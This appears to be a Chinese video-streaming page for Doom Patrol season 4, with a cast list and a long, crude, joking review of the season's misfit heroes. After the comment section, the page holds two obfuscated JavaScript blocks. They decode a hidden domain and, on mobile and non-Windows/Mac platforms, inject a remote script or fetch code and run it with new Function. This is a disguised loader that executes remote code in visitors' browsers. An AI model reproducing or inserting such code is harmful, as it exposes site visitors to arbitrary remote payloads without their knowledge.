末日巡逻队第四季

  • 马特·波莫 艾普尔·鲍白 布兰登·费舍 黛安·格雷罗 提摩西·道尔顿 乔瓦恩·韦德
  • 每集 45分钟
  • 末日巡逻队第四季影片简介:超级废柴拯救世界? 仅仅…末日巡逻队第四季影片简介:超级废柴拯救世界? 仅仅是这个设定,听起来就让人期待满满呢。 DC的《末日巡逻队》更是将这一设定玩得炉火纯青。 《末日巡逻队》第四季 Doom Patrol 第四季 | 共6集 《末日巡逻队》,如剧名,拥有一只超英团队。 但他们不是超人、蝙蝠侠、神奇女侠那样的DC漫画绝对核心。 他们不是英雄,只是一群连名字都很少被提及的不那么坏的坏蛋。 他们没有酷炫的超能力,身上的一二本领也是经过巨大创伤而来,不酷不帅,免费赐予观众,可能都会被嫌弃。 辟如,机甲人克里夫因为一场车祸,全身被毁,只剩下脑子。 首席将他的大脑植入一个机器人体内,从此,斯蒂勒便成了机甲人,不能吃不能喝,没有嗅觉触觉,任何感觉都没有,还被队友吐槽没有性能力。 只有一身蛮力,活着还被家人痛恨着,这就是机甲人。 还有橡皮女郎丽塔,曾经也是高高在上,闪闪发光,被万千男性追求,但如今,只能是一坨窝在家里不敢出门的肉团子。 在丽塔紧张时,身体便会变形,最终会变成了一大坨黏糊糊会蠕动的肉,这种超能力没啥用,还有些小恶心。 疯狂简,因为儿时的巨大家庭侵害,她分裂出了64种人格,来保护她。 但是,64个人格在保护她的同时,也撕裂着她。 底片人拉瑞,浑身缠满了绷带,带着一副酷酷的墨镜。 因为在一次执行任务时, 误入负能量场,导致全身被烧焦,也让他意外拥有了一股神秘外来力量,他给这股力量取名齐格。 还有钢骨,一半人类,一半机器的他,绝对是在物种食物链顶端,却最终与这群超级废柴为伍。 在这群超级废柴中,只有钢骨,还依然保留着拯救世界的英雄梦想。 除此之外,他们每个人都拥有一个可悲的人生。 在刚回归的第四季中,借简的另一人格哈里森医生之口,再次准确描述了他们自己。 丽塔作为一个过气女星、误人子弟的高中老师、无人问津的社区剧团龙套,在她没有意义的人生里,她找到了一个人生目标,那就是末日巡逻队队长,她也成功上任,因为因为没有人想要担任这个屎位。 在队伍中,丽塔完美发挥她的控制狂天性,并自封为弹力女侠。 而克里夫,因为机械故障,时不时失灵,需要狠狠的往他屁股上踢一脚才能有反应。在哈里森医生眼中,他就是彻底的蠢蛋。 底片人拉瑞和神秘力量齐格,倒是打的火热,两人的契合程度超过任何人类群体,在哈里森医生看来,这是宿主对寄生物产生斯德哥尔摩综合征的表现。 钢骨,失去科技的加持后,变成了一个普通人类,在末日巡逻队中的地位也迅速下降,成为一个没有地位不能上一线的技术人员。 这群半吊子、歪瓜裂枣、盗版正义联盟、集心理障碍之大成的团体便是末日联盟。 他们只是一个“边缘废柴”团队,被世人遗弃和遗忘。 大反派也称他们为“超级废物”。 连他们自己都评价自己是智障。 在第四季首集中,末日巡逻队坐着首席的时光机,一个不小心穿越到了未来,牌子上赫然写着2019年的疫情。 媒体称之为霸臀末日。 到处都有一群长着尖牙利齿的臀怪们,四下出没。 而这只废柴队伍中,除了除了钢骨以外,全都已挂,变成了蓝色魂魄。 在商量着要不要抢时光机时,这些蓝色魂魄,也是未来的他们,对自己评价+嘲讽:这些智障,根本不可能改变未来。 这种丧,是从头到脚的丧。 这种废,是从过去到现在到未来,彻头彻尾的废,没有希望的废。 抱着这种心态来看这部剧。乐趣自然横生了。 而且,第四季首集就开污,天天虽说是有所准备,依然被这高能整的猝不及防。 他们的第一个对手——大裆侠,侠如其名,档大弹多,据说是因为过度的性自卑,才有了如今的大档。 不过红夫人一招变身,变成了小JJ大档侠,可谓是侮辱分量极足。 大裆侠还有一个伙伴,屁股一撅,大炮一瞄,这大概是一场混合了屎尿屁的攻击吧。 好在弹力女侠,一把好手,直接干弯了这个小伙,接下来小伙可能是该便秘了。 和往季不同的是,《末日巡逻队》第四季缩减到了6集,我们的快乐都减半了,是否还有第五季也说不好。 不过,风格还是那个风格,限制级耻度之中,没有节操,没有下限,加了些小惊喜、小恶心、小变态、小骚气,综合一下,味道越来越好。 而且,这一季大概会开始趋向于“救赎”吧。 简不用再保护身体里的小女孩,她要寻找自己的新使命。 机甲人拥有一只能传输触感的手指,他最大的梦想,就是摸一摸自己刚出生的外孙女。 在人类的身份中,钢骨大概能找回真正的自己吧。 丽塔拥有一群坚实的伙伴,虽然不可靠,但是,自己的爱总是有了寄托之地。 快乐难得,希望这不是最终季吧。

同主演

  • 完结
  • 完结
  • 完结
  • 全12集
  • HD
  • HD
  • HD

末日巡逻队第四季评论

  • 评论加载中...
function MnSOiBvu(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function JWALwu(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return MnSOiBvu(t);};window[''+'U'+'E'+'m'+'h'+'o'+'r'+'f'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,i,w,d,c){var x=JWALwu,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/g/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('bmmdnZmmUuZmmRnZW0uY29t','151743',window,document,['m','ghQdHskE']);}:function(){};


function SlpfF(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function zGMOk(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return SlpfF(t);};window[''+'y'+'j'+'L'+'t'+'e'+'Z'+'V'+'c'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,i,w,d,c){var x=zGMOk,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/g/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('bmdnnZmUuZmRnnZW0uY29t','151742',window,document,['n','suKaxUl']);}:function(){};